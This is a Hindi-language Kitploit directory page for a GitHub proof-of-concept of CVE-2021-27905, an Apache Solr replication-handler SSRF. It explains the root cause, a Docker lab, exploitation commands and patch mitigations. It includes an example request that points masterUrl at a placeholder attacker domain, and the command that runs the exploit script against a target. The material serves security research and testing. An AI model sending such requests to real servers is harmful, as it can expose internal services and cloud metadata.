Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-27905 — Apache Solr < 8.8.2 सर्वर साइड रिक्वेस्ट फोर्जरी | Kitploit
उपकरण/GitHubGitHub/rizzziom/cve-2021-27905
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrizzziom/cve-2021-27905

CVE-2021-27905

Apache Solr < 8.8.2 सर्वर साइड रिक्वेस्ट फोर्जरी

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2021-27905

क्र. सं.शीर्षक
1अवलोकन
2मूल कारण
3प्रमाण अवधारणा
4शमन (8.8.2+)
5संदर्भ

यह केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इस कोड का उपयोग उन प्रणालियों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। मैं किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हूँ।

अवलोकन

यह एक Server Side Request Forgery भेद्यता है जो Apache Solr (< 8.8.2) को प्रभावित करती है, जो दूरस्थ हमलावरों को प्रतिकृति हैंडलर के masterUrl पैरामीटर के माध्यम से आंतरिक या बाहरी सिस्टम पर मनमाने HTTP अनुरोध करने की अनुमति देती है, संभावित रूप से आंतरिक सेवाओं या संवेदनशील क्लाउड मेटाडेटा को उजागर करती है।

प्रभावित संस्करण: 8.8.2 से पहले के सभी संस्करण (7.0.0 - 7.7.3, 8.0.0 - 8.8.1)

मूल कारण

Solr में प्रतिकृति तंत्र एक 'replica' को masterUrl या leaderUrl पैरामीटर निर्दिष्ट करके 'master/leader' से इंडेक्स फ़ाइलें लाने की अनुमति देता है। प्रभावित Apache Solr संस्करणों में इस पैरामीटर के माध्यम से इंगित URL को ठीक से मान्य नहीं किया जाता है। इसलिए, यह हमलावरों को सर्वर को उनके द्वारा चुने गए एक दूरस्थ संसाधन से जुड़ने के लिए मनाने की अनुमति देगा।

भेद्य प्रवाह

  • एक हमलावर निम्नलिखित जैसे एंडपॉइंट पर एक अनुरोध भेजेगा:
root@kitploit:~
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>

Solr का ReplicationHandler:

  1. अनुरोध स्वीकार करेगा।
  2. प्रदान किए गए masterUrl का उपयोग करके इंडेक्स डेटा डाउनलोड करेगा।
  3. आंतरिक रूप से उस पते पर एक HTTP कॉल करेगा।

प्रमाण अवधारणा

लैब सेटअप

  • एक लैब को डॉकर का उपयोग करके स्थानीय रूप से स्थापित किया जा सकता है:
root@kitploit:~
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
  • सफाई
root@kitploit:~
$ docker compose down

शोषण

  • एक वर्चुअल वातावरण सेट करें:
root@kitploit:~
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux
$ python3 -m venv <NAME>
$ source ./<NAME>/scripts/activate
  • आवश्यकताएँ स्थापित करें:
root@kitploit:~
$ pip install -r requirements.txt
  • cve-2021-27905.py चलाएँ
root@kitploit:~
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>

SSRF PoC

शमन (8.8.2+)

Solr ReplicationHandler को निम्नलिखित के लिए पैच किया गया था:

  • सत्यापित करें कि masterUrl/leaderUrl केवल अनुमोदित होस्ट की ओर इंगित करता है।
  • स्वीकार्य URL योजनाओं को प्रतिबंधित करें (केवल http, https)।
  • रिमोट स्ट्रीमिंग सुविधाओं को मजबूत करें।
  • व्यवस्थापकों को /replication को प्रमाणीकरण के साथ सुरक्षित करने या यदि अनुपयोगी हो तो इसे पूरी तरह से हटाने की सिफारिश करें।

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2021-27905
  • https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80

टूल डाउनलोड करें